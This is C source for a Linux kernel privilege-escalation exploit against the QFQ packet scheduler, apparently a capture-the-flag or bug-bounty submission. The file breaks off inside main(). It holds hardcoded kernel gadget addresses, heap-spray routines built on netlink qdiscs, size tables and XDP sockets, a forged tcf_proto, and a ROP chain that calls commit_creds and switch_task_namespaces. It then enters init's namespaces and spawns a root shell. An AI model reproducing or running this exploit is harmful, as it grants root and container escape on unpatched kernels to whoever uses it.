#define _GNU_SOURCE
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <arpa/inet.h>
#include <sched.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <linux/keyctl.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/pkt_sched.h>
#include <linux/if_packet.h>
#include <linux/if_xdp.h>
#include <linux/pkt_cls.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <signal.h>
#include <netinet/in.h>

typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
typedef char i8;
typedef short i16;
typedef int i32;
typedef long long i64;

_Static_assert (sizeof(u8) == 1, "sizeof(u8) != 1");
_Static_assert (sizeof(u16) == 2, "sizeof(u16) != 2");
_Static_assert (sizeof(u32) == 4, "sizeof(u32) != 4");
_Static_assert (sizeof(u64) == 8, "sizeof(u64) != 8");
_Static_assert (sizeof(i8) == 1, "sizeof(i8) != 1");
_Static_assert (sizeof(i16) == 2, "sizeof(i16) != 2");
_Static_assert (sizeof(i32) == 4, "sizeof(i32) != 4");
_Static_assert (sizeof(i64) == 8, "sizeof(i64) != 8");

#define L(fmt, ...) printf("INFO: " fmt "\n", ##__VA_ARGS__)
#define E(fmt, ...) printf("ERROR: " fmt "\n", ##__VA_ARGS__)

#define FAIL_IF(x) if ((x)) { \
    perror(#x); \
    return -1; \
}

#define pad4(x) (u8)x, (u8)x, (u8)x, (u8)x
#define pad8(x) pad4(x), pad4(x)

#define p64(x) (u8)(((x) >> 0) & 0xFF), \
    (u8)(((u64)(x) >> 8) & 0xFF), \
    (u8)(((u64)(x) >> 16) & 0xFF), \
    (u8)(((u64)(x) >> 24) & 0xFF), \
    (u8)(((u64)(x) >> 32) & 0xFF), \
    (u8)(((u64)(x) >> 40) & 0xFF), \
    (u8)(((u64)(x) >> 48) & 0xFF), \
    (u8)(((u64)(x) >> 56) & 0xFF)

#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))

#define PACK __attribute__((__packed__))

#define __EVENT_SET 0
#define __EVENT_UNSET 1

#define EVENT_DEFINE(name, init) volatile int name = init
#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); }

#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE)
#define EVENT_SET(name) __atomic_store_n(&name, __EVENT_SET, __ATOMIC_RELEASE)

// GADGETS {
u64 find_task_by_vpid = 0xffffffff8110a0d0;
u64 switch_task_namespaces = 0xffffffff81111c80;
u64 commit_creds = 0xffffffff811136f0;
u64 prepare_kernel_cred = 0xffffffff811139d0;
u64 init_task = 0xffffffff836159c0;
u64 init_nsproxy = 0xffffffff83661680;
u64 oops_in_progress = 0xffffffff8419f478;
u64 mov_rdi_rax = 0xffffffff81041293; // mov rdi, rax; mov rax, rdx; xor edx, edx; div rcx; mov rdx, [rip+0x315da13]; add rax, rdi; jmp 0xffffffff82404440 {taken}; ret // 4889c74889d031d248f7f1488b1513da15034801f8e9c3223c01c3
u64 pop_rcx_ret = 0xffffffff8102898c; // pop rcx; ret // 59c3
u64 pop_rsi = 0xffffffff8101806c; // pop rsi; jmp 0xffffffff82404440 {taken}; ret // 5ee9ce1e4001c3
u64 pop_rdi = 0xffffffff8102764d; // pop rdi; jmp 0xffffffff82404440 {taken}; ret // 5fe97e094001c3
u64 push_rsi_jmp_rsi_0x39 = 0xffffffff818ca79b; // push rsi; jmp qword ptr [rsi+0x39] {taken} // 56ff6639

u64 pop_rsp = 0xffffffff8100143b; // pop rsp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 5ce9ff2f4001c3
u64 add_rsp_0x88 = 0xffffffff8103d43d; // add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 4881c488000000e9f76f3c01c3

u64 enter_pop_rbx_pop_rbp_pop_r12 = 0xffffffff81b14680; // enter 0, 0; pop rbx; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // c80000005b5d415ce9b3fd8e00c3
// -> rbx = rbp, pop rbp, pop r12
u64 mov_rbp_rbx_pop_rbx_pop_rbp = 0xffffffff8107ff46; // mov [rbp], rbx; pop rbx; pop rbp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 48895d005b5de9ef443801c3
u64 push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12 = 0xffffffff81be0fed; // push qword ptr [rcx+rsi+0x5b]; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // ff74315b5d415ce947348200c3

// trailer of qfq_enqueue
//  0xffffffff81cd460f <+591>:   lea    -0x28(%rbp),%rsp
//  0xffffffff81cd4613 <+595>:   mov    %ecx,%eax
//  0xffffffff81cd4615 <+597>:   pop    %rbx
//  0xffffffff81cd4616 <+598>:   pop    %r12
//  0xffffffff81cd4618 <+600>:   pop    %r13
//  0xffffffff81cd461a <+602>:   pop    %r14
//  0xffffffff81cd461c <+604>:   pop    %r15
//  0xffffffff81cd461e <+606>:   pop    %rbp
//  0xffffffff81cd461f <+607>:   jmp    0xffffffff82404440 <__x86_return_thunk>
u64 leave = 0xffffffff81cd460f;

u64 add_rcx_edi = 0xffffffff81063063; // add [rcx], edi; ret // 0139c3

// } GADGETS

#define FOR_ALL_OFFSETS(x) do { \
    x(find_task_by_vpid); \
    x(switch_task_namespaces); \
    x(commit_creds); \
    x(prepare_kernel_cred); \
    x(init_task); \
    x(init_nsproxy); \
    x(oops_in_progress); \
    x(mov_rdi_rax); \
    x(pop_rcx_ret); \
    x(pop_rsi); \
    x(pop_rdi); \
    x(push_rsi_jmp_rsi_0x39); \
    x(pop_rsp); \
    x(add_rsp_0x88); \
    x(enter_pop_rbx_pop_rbp_pop_r12); \
    x(mov_rbp_rbx_pop_rbx_pop_rbp); \
    x(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12); \
    x(leave); \
    x(add_rcx_edi); \
  } while(0)

// Reverse calculation of the index in sch_qfq.c:qfq_calc_index
// Our desired index will be 27 so that the fake group resides at offset 288 into
// our large spray object.
#define _TARGET_INDEX 27
#define _MIN_SLOT_SHIFT 25
#define _NUM_CLS 1
#define _CLS_WEIGHT 1
#define _ONE_FP 0x40000000
#define LMAX ((1ull << (_TARGET_INDEX + _MIN_SLOT_SHIFT - 1)) / (_ONE_FP / (_CLS_WEIGHT * _NUM_CLS)) / _NUM_CLS)

#define SIZEOF_QDISC_SIZE_TABLE 60

struct list_head {
  struct list_head *         next;                 /*     0     8 */
  struct list_head *         prev;                 /*     8     8 */

  /* size: 16, cachelines: 1, members: 2 */
  /* last cacheline: 16 bytes */
};


struct hlist_head {
  struct hlist_node *        first;                /*     0     8 */

  /* size: 8, cachelines: 1, members: 1 */
  /* last cacheline: 8 bytes */
};

struct hlist_node {
  struct hlist_node *        next;                 /*     0     8 */
  struct hlist_node * *      pprev;                /*     8     8 */

  /* size: 16, cachelines: 1, members: 2 */
  /* last cacheline: 16 bytes */
};

struct tcf_proto {
  void*         next;                 /*     0     8 */
  void *                     root;                 /*     8     8 */
  int                        (*classify)(void*, const struct tcf_proto  *, void*); /*    16     8 */
  u16                     protocol;             /*    24     2 */

  /* XXX 2 bytes hole, try to pack */
  u8 __pad0[2];

  u32                        prio;                 /*    28     4 */
  void *                     data;                 /*    32     8 */
  const void  * ops;               /*    40     8 */
  void *         chain;                /*    48     8 */
  u32                 lock;                 /*    56     4 */
  u8                       deleting;             /*    60     1 */

  /* XXX 3 bytes hole, try to pack */
  u8 __pad1[3];

  /* --- cacheline 1 boundary (64 bytes) --- */
  u32                 refcnt;               /*    64     4 */

  /* XXX 4 bytes hole, try to pack */
  u8 __pad2[4];

  u8       rcu[16];
  struct hlist_node          destroy_ht_node;      /*    88    16 */

  /* size: 104, cachelines: 2, members: 13 */
  /* sum members: 95, holes: 3, sum holes: 9 */
  /* forced alignments: 1, forced holes: 1, sum forced holes: 4 */
  /* last cacheline: 40 bytes */
} PACK;
_Static_assert(sizeof(struct tcf_proto) == 104);

struct qfq_group {
  u64                        S;                    /*     0     8 */
  u64                        F;                    /*     8     8 */
  unsigned int               slot_shift;           /*    16     4 */
  unsigned int               index;                /*    20     4 */
  unsigned int               front;                /*    24     4 */

  u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */

  long unsigned int          full_slots;           /*    32     8 */
  struct hlist_head          slots[32];            /*    40   256 */

  /* size: 296, cachelines: 5, members: 7 */
  /* sum members: 292, holes: 1, sum holes: 4 */
  /* last cacheline: 40 bytes */
} PACK;

struct stab_payload {
  u8 __pad1[288 - SIZEOF_QDISC_SIZE_TABLE];
  struct qfq_group group;
  u8 __pad2[4098 - sizeof(struct qfq_group) - 288 - 4];
  u32 id;
} PACK;
_Static_assert(sizeof(struct stab_payload) > 4096 - SIZEOF_QDISC_SIZE_TABLE);

// Our fake tcf_proto we will place into qfq_sched->filter_list
struct tcf_proto_payload {
  union {
    struct tcf_proto org;
    u64 stack[100];
  };
} PACK;

static int _pin_to_cpu(int id) {
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(id, &set);
  return sched_setaffinity(getpid(), sizeof(set), &set);
}

static u64 leak_kernel_base = 0;

static void* payload = NULL;
static struct stab_payload fake_group = {0};

int get_kernel_base();

#ifndef ATTEMPT_LARGE_EVERY
#define ATTEMPT_LARGE_EVERY 17
#endif

void maybe_win() {
  int fd = open("/proc/1/ns/mnt", O_RDONLY);
  if (fd < 0) {
    return;
  }

  L("SUCCESS.");
  setns(fd, 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);

  L("spawning shell ..");
  char* argv[] = {
    "/bin/sh",
    "-c",
    "/bin/cat /flag && /bin/sh",
    NULL,
  };
  execve(argv[0], argv, NULL);
  exit(1);
}


void prep_tcf_proto_payload(struct tcf_proto_payload* p) {
  memset(p, 0, sizeof(*p));

  // store framepointer at a sane address.
  const u64 framepp = oops_in_progress;

  u8 rop[] = {
    [0] = p64(add_rsp_0x88),

    [0x39] = p64(pop_rsp),

    [8 + 0x88] = p64(enter_pop_rbx_pop_rbp_pop_r12),
    p64(framepp),
    p64(0xdead000000000001), // scratch r12
    p64(mov_rbp_rbx_pop_rbx_pop_rbp),
    p64(0xdead000000000002), // scratch rbx
    p64(0xdead000000000003), // scratch rbp
    p64(add_rsp_0x88),

    [8 + 0x88 + 8 * 7 + 0x88] = p64(add_rsp_0x88),

    [8 + 0x88 + 8 * 7 + 0x88 + 8 + 0x88] = p64(pop_rdi),
    p64(init_task),
    p64(prepare_kernel_cred),
    p64(pop_rcx_ret),
    pad8('C'), // this is just to make sure that the div does not raise exception
    p64(mov_rdi_rax),
    p64(commit_creds),

    p64(pop_rdi),
    p64(1),
    p64(find_task_by_vpid),
    p64(pop_rcx_ret),
    pad8('C'), // this is just to make sure that the div does not raise exception
    p64(mov_rdi_rax),
    p64(pop_rsi),
    p64(init_nsproxy),
    p64(switch_task_namespaces),

    // restore execution in qfq_enqueue
    p64(pop_rcx_ret),
    p64(framepp),
    p64(pop_rdi),
    p64(0x48),
    p64(add_rcx_edi),
    p64(pop_rsi),
    p64(-0x5b),
    p64(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12),
    p64(0xdead000000000004), // scratch r12
    p64(leave),
  };

  _Static_assert(sizeof(rop) < sizeof(p->stack));
  memcpy(p->stack, rop, sizeof(rop));

  p->org.protocol = 8;
  p->org.classify = (void*)push_rsi_jmp_rsi_0x39;
  p->org.ops = (void*)0xdead000000000000;
}

void prep_stage1_large_payload(struct stab_payload* p) {
  memset(p, 0, sizeof(*p));

  // This index will control the bit we flip.
  // 8192 - offsetof(struct Qdisc, privdata) - offsetof(struct qfq_sched, bitmaps))   // the rest of the first qdisc
  // + 8192                                                                           // spacing of key payload
  // + offsetof(struct Qdisc, privdata) + offsetof(struct qfq_sched, filter_list)     // offset into the second qdisc
  // (times 8 + FFS(0x80))
  p->group.index = (8192 - 384 - 72 + 8192 + 384 + 0) * 8 + 7;
}

static int last_worker = 0;
static struct {
    int pid;
    void* stack;
} workers[200] = {0};

int spawn_worker(int (*target)(void*), void* arg) {
  void* stack = workers[last_worker].stack;

  if (stack == NULL) {
    stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
    FAIL_IF(stack == MAP_FAILED);
    workers[last_worker].stack = stack;
  }

  int child = clone(target, stack + 0x4000, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM, arg);

  if (child < 0) {
    return -1;
  }

  workers[last_worker].pid = child;
  last_worker++;

  return last_worker - 1;
}

int kill_worker(int index) {
  if (workers[index].pid > 0) {
    kill(workers[index].pid, SIGKILL);
    workers[index].pid = -1;
  }

  if (index == last_worker - 1) {
    last_worker--;
  }

  return 0;
}

int netlink_errno(int fd, struct nlmsghdr* nlh) {
  assert(nlh->nlmsg_type == NLMSG_ERROR);
  struct nlmsgerr* e = NLMSG_DATA(nlh);
  assert(nlh->nlmsg_len >= NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(*e)));

  if (e->error != 0) {
    E("netlink error: %d", e->error);
    errno = -e->error;
  }

  return e->error;
}

int netlink_send_recv(int fd, void* buf, int size) {
  struct iovec iov = {
    .iov_base = buf,
    .iov_len = size,
  };
  struct msghdr msg = {
    .msg_name = NULL,
    .msg_namelen = 0,
    .msg_iov = &iov,
    .msg_iovlen = 1,
    .msg_control = NULL,
    .msg_controllen = 0,
    .msg_flags = 0,
  };
  if (sendmsg(fd, &msg, 0) < 0) {
    perror("sendmsg()");
    return -1;
  }

  msg.msg_flags = MSG_TRUNC;
  msg.msg_iov = NULL;
  msg.msg_iovlen = 0;
  iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC);
  if (iov.iov_len < 0) {
    perror("recvmsg()");
    return -1;
  }
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  return recvmsg(fd, &msg, 0);
}

static volatile int wake = 0;
static volatile int done = 0;
static volatile int qdisc_trigger_bug = 0;
static volatile int qdisc_trigger_payload = 0;
// event which will be set whenever control is handed over back to main
static EVENT_DEFINE(parent_notify, __EVENT_UNSET);

int prepare_device(int s, int ifindex) {
  struct nlmsghdr* nlh = calloc(1, 4096);
  FAIL_IF(nlh == NULL);

  struct ifinfomsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWLINK;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  // Up the device
  data->ifi_family = PF_UNSPEC;
  data->ifi_type = 0;
  data->ifi_index = ifindex;
  data->ifi_flags = IFF_UP;
  data->ifi_change = 1;

  // Set MTU size, used to trigger the vulnerability
  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  attr->nla_type = IFLA_MTU;
  attr->nla_len = NLA_HDRLEN + 4;
  u32* attr_data = (void*)attr + NLA_HDRLEN;
  *attr_data = LMAX;

  nlh->nlmsg_len += attr->nla_len;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to prepare device!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a rsvp tcfilter, used to spray our tcf_proto object
int create_tcfilter(int s, int ifindex, u32 parent, u16 prio) {
  struct nlmsghdr* nlh = calloc(1, 4096);
  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWTFILTER;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = parent;
  data->tcm_handle = 0;

  u16 protocol = 8;
  data->tcm_info = ((u32)prio << 16) | (u32)protocol;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  do {
    attr->nla_type = TCA_KIND;
    attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("rsvp") + 1);

    char* attr_data = (char*)attr + NLA_HDRLEN;
    strcpy(attr_data, "rsvp");

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;
  } while (0);

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  int err = netlink_errno(s, nlh);

  // This sometimes shows EBUSY, but it still works?
  // We just ignore the error, ...
  if (err != -EBUSY && err != 0) {
    E("failed to create tcfilter!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a netem qdisc with a large delay, used to slow down the enqueue / dequeue logic
int create_netem_qdisc(int s, int ifindex, u32 parent, u32 handle) {
  struct nlmsghdr* nlh = calloc(2, 8192);
  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWQDISC;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = parent;
  data->tcm_handle = handle & 0xFFFF0000;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  do {
    attr->nla_type = TCA_KIND;
    attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("netem") + 1);

    char* attr_data = (char*)attr + NLA_HDRLEN;
    strcpy(attr_data, "netem");

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;

    attr->nla_type = TCA_OPTIONS;
    attr->nla_len = NLA_HDRLEN + sizeof(struct tc_netem_qopt);

    struct tc_netem_qopt* netem_qopt = (void*)attr + NLA_HDRLEN;
    netem_qopt->latency = 1000u * 1000 * 5000; // latency in us
    netem_qopt->limit = 1;

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;
  } while (0);

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create netem qdisc!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a qfq qdisc, main qdisc of interest
int create_qfq_qisc(int s, int ifindex, u32 parent, u32 handle) {
  struct nlmsghdr* nlh = calloc(1, 8192);

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWQDISC;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = TC_H_ROOT;
  data->tcm_handle = handle & 0xFFFF0000;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));

  do {
    attr->nla_type = TCA_KIND;
    attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("qfq") + 1);

    char* attr_data = (char*)attr + NLA_HDRLEN;
    strcpy(attr_data, "qfq");

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;


    // This is the sizetable we spray alongside each qdisc
    attr->nla_type = TCA_STAB;
    attr->nla_len = NLA_HDRLEN;

    struct nlattr* nested = (void*)attr + NLA_HDRLEN;
    nested->nla_type = TCA_STAB_BASE;
    nested->nla_len = NLA_HDRLEN + sizeof(struct tc_sizespec);
    attr->nla_len += nested->nla_len;

    struct tc_sizespec* sizespec = (void*)nested + NLA_HDRLEN;
    sizespec->cell_log = 10;
    sizespec->size_log = 0;
    sizespec->cell_align = 0;
    sizespec->overhead = 0;
    sizespec->linklayer = 0;
    sizespec->mpu = 0;
    sizespec->mtu = 0;
    sizespec->tsize = sizeof(struct stab_payload) / sizeof(u16);

    nested = (void*)nested + nested->nla_len;
    nested->nla_type = TCA_STAB_DATA;
    nested->nla_len = NLA_HDRLEN + sizespec->tsize * sizeof(u16);
    attr->nla_len += nested->nla_len;

    fake_group.id++;
    memcpy((void*)nested + NLA_HDRLEN, &fake_group, sizeof(fake_group));

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;
  } while (0);

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create qfq qdisc!");
    free(nlh);
    return -1;
  }

free(nlh);
return 0;
}

// Delete a class from a qdisc
int delete_class(int s, int ifindex, u32 handle) {
  L("deleting class %x", handle);

  struct nlmsghdr* nlh = calloc(1, 4096);
  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_DELTCLASS;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = TC_H_ROOT;
  data->tcm_handle = handle;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to delete class!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Add a helper class to a qdisc
int create_helper_class(int s, int ifindex, u32 class_handle, u32 sub_qdisc_handle, u32 lmax) {
  struct nlmsghdr* nlh = calloc(1, 4096);

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWTCLASS;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = TC_H_ROOT;
  data->tcm_handle = class_handle;


  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  struct nlattr* nested;

  do {
    attr->nla_type = TCA_OPTIONS;
    attr->nla_len = NLA_HDRLEN;

    if (lmax) {
      nested = (void*)attr + NLA_HDRLEN;
      nested->nla_type = TCA_QFQ_LMAX;
      nested->nla_len = NLA_HDRLEN + sizeof(u32);
      attr->nla_len += nested->nla_len;
      *(u32*)((void*)nested + NLA_HDRLEN) = lmax;
    }

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;
  } while (0);

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create helper class!");
    free(nlh);
    return -1;
  }
  free(nlh);

  if (sub_qdisc_handle != 0) {
    return create_netem_qdisc(s, ifindex, class_handle, sub_qdisc_handle);
  }

  return 0;
}

int spray_one_umem(void* buf) {
  struct xdp_umem_reg mr = {0};
  // __u64 addr; /* Start of packet data area */
  // __u64 len; /* Length of packet data area */
  // __u32 chunk_size;
  // __u32 headroom;
  // __u32 flags;

  mr.addr = (u64)buf;
  mr.chunk_size = 0x1000;
  mr.len = 4 * 0x1000; // anything other than 8 is fine (the protocol we try to classify with the fake proto)
  mr.headroom = 0;
  mr.flags = 0;

  int s = socket(AF_XDP, SOCK_RAW, 0);
  FAIL_IF(s < 0);

  FAIL_IF(setsockopt(s, SOL_XDP, XDP_UMEM_REG, &mr, sizeof(mr)) < 0);
  return s;
}

// Worker to spray qdiscs and potentially trigger the vulnerabilty.
// Each worker will have its own network namespace and create qdiscs
// for the loopback device.
// We could create virtual devices, but here we are.
int bug_worker(void* arg) {
  int i = *(int*)arg;

  FAIL_IF(_pin_to_cpu(0) != 0);

  const u32 handle = 0x10000000 | (i << 16);
  const u32 handle_oob = handle | (1 << 0);
  const u32 handle_help = handle | (1 << 1);
  const u32 handle_faked1 = handle | (1 << 2);

  const u32 sub_handle_help = 0x20010000;
  const u32 sub_handle_oob = 0x20020000;

  const int loindex = if_nametoindex("lo");

  int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  FAIL_IF(s < 0);

  struct sockaddr_nl addr = {0};
  addr.nl_family = AF_NETLINK;

  FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0);

  // Up the device and set the MTU to LMAX, which will trigger the vulnerability
  // later on.
  if (prepare_device(s, loindex) < 0) {
    return -1;
  }

  // Prepare qfq qdisc without anything else.
  // Eventually we will create everything of interest when we pull the trigger.
  // Until that this qdisc serves as some kind of "grooming" object.
  if (create_qfq_qisc(s, loindex, TC_H_ROOT, handle) < 0) {
    return -1;
  }

  #define NUM_SOCKETS2 4
  int payloads[NUM_SOCKETS2*2] = {0};

  #define _WAIT_FOR_WAKEUP() { \
    while (wake != i) { \
      sleep(1); \
      if (done) { \
        return 0; \
      } \
    } \
    wake = 0; \
  }

  for (int i = 0; i < NUM_SOCKETS2*2; i++) {
    if (payloads[i] > 0) {
      close(payloads[i]);
      payloads[i] = 0;
    }
  }
  for (int i = 0; i < NUM_SOCKETS2; i++) {
    payloads[i] = spray_one_umem(payload);
    FAIL_IF(payloads[i] < 0);
  }
  FAIL_IF(create_tcfilter(s, loindex, handle, 0x1111) != 0);
  for (int i = 0; i < NUM_SOCKETS2; i++) {
    payloads[i + NUM_SOCKETS2] = spray_one_umem(payload);
    FAIL_IF(payloads[i + NUM_SOCKETS2] < 0);
  }

  EVENT_SET(parent_notify);
  _WAIT_FOR_WAKEUP();

  if (i == qdisc_trigger_bug) {
    L("worker %d is entering stage 1b: trigger vulnerability", i);

    L("trying to prepare helper class ..");
    // This is a real helper class: We use it to make the code below follow
    // certain paths in sch_qfq.c
    // We require the following:
    //  - qfq_sch->in_serv_agg != NULL
    //  - qfq_sch->in_serv_agg != OOB agg
    // We use a netem qdisc with a large delay to consistently hit the window
    // between qfq_enqueue -> qfq_dequeue where the in_serv_agg would be reset.
    if (create_helper_class(s, loindex, handle_help, sub_handle_help, 0x1000) != 0) {
      E("failed to create helper class :(");
      return -1;
    }

    L("trying to prepare oob class ..");
    // Class which will carry the aggregate with the OOB group
    // In order to hit the desired update code paths, this class needs
    // packets in its (sub)qdisc.
    if (create_helper_class(s, loindex, handle_oob, sub_handle_oob, 0x2000) != 0) {
      E("failed to create oob class :(");
      return -1;
    }

    L("activating helper agg ..");
    u8 buf[1] = {0};

    int sc, ss;
    struct sockaddr_in addr;
    u32 addr_len;

    ss = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(ss < 0);
    sc = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(sc < 0);

    addr.sin_family = AF_INET;
    addr.sin_port = 0;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    addr_len = sizeof(addr);

    FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0);
    FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0)

    // set in_serv_agg = helper agg
    FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_help, sizeof(handle_help)) < 0);
    FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    // make (not-yet) oob class active
    FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_oob, sizeof(handle_oob)) < 0);
    FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    // trigger vulnerability
    // This will create a qfq_aggregate with an OOB group as controlled
    // by the MTU we set earlier.
    if (create_helper_class(s, loindex, handle_oob, 0, 0) != 0) {
      E("failed to trigger vulnerability :(");
      return -1;
    }

    close(ss);
    close(sc);

    EVENT_SET(parent_notify);
    _WAIT_FOR_WAKEUP();
    return -1;
  }

  {
    // trigger payload

    int sc, ss;
    struct sockaddr_in addr;
    u32 addr_len;
    ss = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(ss < 0);
    sc = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(sc < 0);

    addr.sin_family = AF_INET;
    addr.sin_port = 0;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    addr_len = sizeof(addr);

    FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0);
    FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0)

    // trigger, what we send does not matter
    FAIL_IF(sendto(sc, &addr, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    maybe_win();

    // payload failed ..
    EVENT_SET(parent_notify);
    _WAIT_FOR_WAKEUP();

    return -1;
  }
}

int main(int argc, char* argv[]) {
  // main orchestration routine.

  // Hopefully less noise due to thread creation
  FAIL_IF(_pin_to_cpu(1) != 0);

